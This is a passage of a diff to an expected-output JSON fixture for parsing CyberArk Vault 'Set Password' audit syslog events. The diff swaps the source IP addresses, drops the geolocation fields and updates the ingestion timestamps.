@@ -252,7 +252,7 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212152100Z", + "ingested": "2021-12-09T13:37:13.320145400Z", "original": "\u003c5\u003e1 2021-03-10T08:29:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:29:28\",\"IsoTimestamp\":\"2021-03-10T08:29:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" @@ -265,20 +265,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -295,7 +283,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -303,7 +291,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:52Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMPApp_localhost.localdomain", 
@@ -317,8 +305,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212153400Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320150400Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } 
@@ -330,20 +318,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -360,7 +336,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -368,7 +344,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:52Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMPGW_localhost.localdomain", 
@@ -382,8 +358,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212154600Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320154900Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:52\",\"IsoTimestamp\":\"2021-03-10T09:11:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } 
@@ -395,20 +371,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -425,7 +389,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -433,7 +397,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:55Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMP_ADB_localhost.localdomain", 
@@ -447,8 +411,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212155800Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320159200Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:55Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:55\",\"IsoTimestamp\":\"2021-03-10T09:11:55Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } 
@@ -460,20 +424,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -490,7 +442,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -498,7 +450,7 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-10T18:46:47Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Set Password", "message": "Set Password", "issuer": "PSMApp_VAGRANT", 
@@ -512,8 +464,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212157600Z", - "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320163200Z", + "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } 
@@ -525,20 +477,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -555,7 +495,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -563,7 +503,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T18:46:47Z",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMGw_VAGRANT",
@@ -577,8 +517,8 @@
 "event": {
 "severity": 2,
 "action": "set password",
- "ingested": "2021-06-09T10:24:37.212158800Z",
- "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:13.320167Z",
+ "original": "\u003c5\u003e1 2021-03-10T18:46:47Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:46:47\",\"IsoTimestamp\":\"2021-03-10T18:46:47Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_VAGRANT\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -590,19 +530,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -619,7 +548,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -627,7 +556,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T22:20:12Z",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMApp_ASR-WIN",
@@ -641,8 +570,8 @@
 "event": {
 "severity": 2,
 "action": "set password",
- "ingested": "2021-06-09T10:24:37.212160Z",
- "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:13.320171500Z",
+ "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMApp_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -654,19 +583,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-VA",
- "country_name": "United States",
- "region_name": "Virginia",
- "location": {
- "lon": -77.2481,
- "lat": 38.6583
- },
- "country_iso_code": "US"
- },
- "address": "35.192.121.42",
- "ip": "35.192.121.42"
+ "address": "67.43.156.14",
+ "ip": "67.43.156.14"
 },
 "tags": [
 "preserve_original_event"
@@ -683,7 +601,7 @@
 },
 "related": {
 "ip": [
- "35.192.121.42"
+ "67.43.156.14"
 ]
 },
 "cyberarkpas": {
@@ -691,7 +609,7 @@
 "severity": "Info",
 "rfc5424": true,
 "iso_timestamp": "2021-03-10T22:20:12Z",
- "station": "35.192.121.42",
+ "station": "67.43.156.14",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMGw_ASR-WIN",
@@ -705,8 +623,8 @@
 "event": {
 "severity": 2,
 "action": "set password",
- "ingested": "2021-06-09T10:24:37.212161300Z",
- "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
+ "ingested": "2021-12-09T13:37:13.320176600Z",
+ "original": "\u003c5\u003e1 2021-03-10T22:20:12Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:20:12\",\"IsoTimestamp\":\"2021-03-10T22:20:12Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMGw_ASR-WIN\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}",
 "code": "88",
 "kind": "event"
 }
@@ -718,20 +636,8 @@
 }
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -748,7 +654,7 @@
 },
 "related": {
 "ip": [
- "81.32.170.205"
+ "67.43.156.13"
 ]
 },
 "cyberarkpas": {
@@ -756,8 +662,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-11T16:59:54Z", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e",
 "action": "Set Password",
 "message": "Set Password",
 "issuer": "PSMPApp_VAGRANT",
@@ -771,8 +677,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212162700Z", - "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320180600Z", + "original": "\u003c5\u003e1 2021-03-11T16:59:54Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 08:59:54\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T16:59:54Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 08:59:54\",\"IsoTimestamp\":\"2021-03-11T16:59:54Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set 
